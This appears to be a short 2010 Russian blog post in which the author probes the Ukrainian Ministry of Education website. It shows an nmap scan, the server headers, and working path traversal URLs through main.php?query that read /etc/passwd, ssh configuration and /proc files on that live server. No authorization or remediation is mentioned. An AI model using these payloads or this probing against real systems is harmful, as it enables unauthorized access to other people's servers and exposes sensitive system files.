Министерство образования и науки Украины… Образование 2.0 говорите?
Сегодня товарищи поделились интересной ссылкой
* www.mon.gov.ua/main.php?query=../../../etc/passwd
Стало интересно глянуть, а чего там открыто?
Бесхитростно:
$ nmap www.mon.gov.ua
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2010-04-09 10:40 EEST
Interesting ports on 212.111.193.189:
Not shown: 1679 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap finished: 1 IP address (1 host up) scanned in 76.253 seconds
Что-ж… Тоже вариант… 80 порт и только… Жаль…
$ w3m -dump_head www.mon.gov.ua
HTTP/1.1 200 OK
Date: Fri, 09 Apr 2010 07:43:50 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Ну тогда стал прорезаться просто исследовательский азарт:
* www.mon.gov.ua/main.php?query=../../../etc/rc
* www.mon.gov.ua/main.php?query=../../../etc/rc.local
* www.mon.gov.ua/main.php?query=../../../etc/ssh/ssh_config
* www.mon.gov.ua/main.php?query=../../../proc/cpuinfo
* www.mon.gov.ua/main.php?query=../../../proc/meminfo
http://habrahabr.ru/blogs/infosecurity/90473/